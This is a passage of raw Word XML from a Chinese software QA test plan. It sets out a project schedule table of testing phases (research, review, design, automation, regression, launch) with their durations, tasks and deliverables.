                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>，网络攻击等故意破坏操作。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31C22FDC"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可以参照之前整理的分布式异常体系进行异常模拟</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="479737A8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F3F0D31" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="169" w:name="_Toc36487891"/>
      <w:bookmarkStart w:id="170" w:name="_Toc36573216"/>
      <w:bookmarkStart w:id="171" w:name="_Toc36630293"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目整体计划</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
      <w:bookmarkEnd w:id="164"/>
      <w:bookmarkEnd w:id="165"/>
      <w:bookmarkEnd w:id="169"/>
      <w:bookmarkEnd w:id="170"/>
      <w:bookmarkEnd w:id="171"/>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066"/>
        <w:gridCol w:w="1165"/>
        <w:gridCol w:w="2074"/>
        <w:gridCol w:w="1807"/>
        <w:gridCol w:w="698"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="4C913BB2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8DB3E2"/>
          </w:tcPr>
          <w:p w14:paraId="00E9BD2A"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项目阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8DB3E2"/>
          </w:tcPr>
          <w:p w14:paraId="220A95C1"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时间段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1165" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8DB3E2"/>
          </w:tcPr>
          <w:p w14:paraId="0B1FC803"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参与人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8DB3E2"/>
          </w:tcPr>
          <w:p w14:paraId="5D48D139"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测试工作内容安排</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8DB3E2"/>
          </w:tcPr>
          <w:p w14:paraId="4D8F6DC2"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产出</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="698" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8DB3E2"/>
          </w:tcPr>
          <w:p w14:paraId="127278CE"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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="00290230" w14:paraId="72BFC371" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AABF2BA"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调研阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="318BCC52"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4天</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B2A3E47"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7EA4177C"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参与调研讨论</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7825ED40" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="698" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="620B9E2B"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14DF0090" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41B9AE80"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需求评审阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B68466F"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1天</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A62D350"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7C51665F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>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了解项目背景资料</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59D14132" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>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阅读mrd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BBF1094" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>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lastRenderedPageBreak/>
              <w:t>反馈评审问题</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BEBC971" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>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参与需求评审</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F9BDF6D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>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确认评审结论</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39D71750" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>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初步评估测试计划</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BA6332E"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lastRenderedPageBreak/>
              <w:t>评审批注反馈</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02061A65"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初步测试计划</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="698" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F2F4E63"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0C1C66D0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A256190"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详细设计阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="171CB592" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:left="420"/>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1周</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="436E56DD"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7B07384B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>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分析产品功能，确认测试需求</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F07978B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>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进行测试点拆分</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="414DAAE7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>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反馈评审问题</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BA23FFA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>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参与设计评审</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A7D2E69" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>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确认设计评审结论</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F6A751F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>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确定测试初步方案</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="221BED39"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评审批注反馈</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="246857B6"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测试框架</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51F996D7"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功能点拆分文档</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F1C9902"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测试点拆分文档</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3726D8F0"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初步测试方案</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="685D48BA"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测试计划调整</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="698" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DBBE3BB"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6EADD2F3" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38A0DFED"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RD开发阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EBB60F1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:ind w:left="420"/>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1周</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4582A8DC"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4094D950" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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确定测试方案</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2961A04A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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确定自动化测试点</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="214F02A3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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撰写测试case和相关关键字</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F24F331" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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准备测试数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77927FAE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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自动生成自动化case</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A39312B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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FE提交页面后获取页面对象</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F201B50" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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开发测试工具</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DC473A0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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测试方案和测试设计评审</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5494975E"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关键字列表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="637FCD9C"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C</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ase书写规范</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38FFB90E"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测试case文档</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="456B30B1"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自动化case</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C37D1A4"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测试工具和程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="698" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4472442A"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328FF2F3" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D82B05C"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准入测试阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39B48B78"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1周</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E575076"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56B69ED9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>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环境部署</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36F8DED2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>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准入测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0488FF07" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>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完善自动化case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16AC4FC4"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测试环境</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B7CC9B9"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准入测试结论</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D53AEE7"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部分自动化case及执行结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="698" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E698E95"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39AA28C5" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="576821D4"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第一遍全面测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50E69BC7"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1周</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39F3125C"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3D1430EF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>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执行手工测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AA60EAD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>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执行自动化case</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F8DD21F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>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性能测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EC2CFD8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>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完善自动化case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72AC707A"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手工测试结论</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C63DE72"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部分关键字</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E59AB6E"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完善或新补充的自动化case</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51128A01"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性能测试结果</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4529B2"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自动化case结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="698" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B5D69A2"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44603A5C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FEADAE4"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b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ug回归测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FDC480C"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1周</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40C4F1CA"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5E7CAEEB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>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确认bug修复情况</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="704F53B8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>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执行自动化case</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E4BBEB1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>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完善自动化case</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ADF6817" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>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lastRenderedPageBreak/>
              <w:t>性能测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57A90163"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lastRenderedPageBreak/>
              <w:t>B</w:t>
            </w:r>
            <w:r w:rsidRPr="00290230">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ug确认结论</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09A7144D"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部分关键字</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69C27F93"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完善或新补充的自动化case</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A50DAE"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lastRenderedPageBreak/>
              <w:t>自动化case结果</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="080ABFE7"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性能测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="698" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F70C5C8"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1299D0B1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AABB7CF"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全面回归测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68B7589D"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1周</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CCF65C3"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1B7FC4CE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>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执行手工回归测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FADD9F2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>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执行自动化casee</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B8EDADA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>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性能测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="526EB10A"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测试结论和测试报告</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="698" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B8AB049"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6004CF41" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31E7C6A1"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交叉自由测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23BBEE6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1周</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BB585B5"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7DD77BF8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>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PM、RD、QA交叉自由测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EBBC5D0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>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常规检查自动化case执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14A0ABFC"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测试结论和测试报告</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="698" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72F299D7"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0BB22669" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1162" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="338FDE16"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上线阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3147B3EE"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4天</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1165" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26CE854F"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5BDCE4FD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>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上线辅助</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4449AE14" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00290230" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>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线上检查</w:t>
            </w:r>
          </w:p>
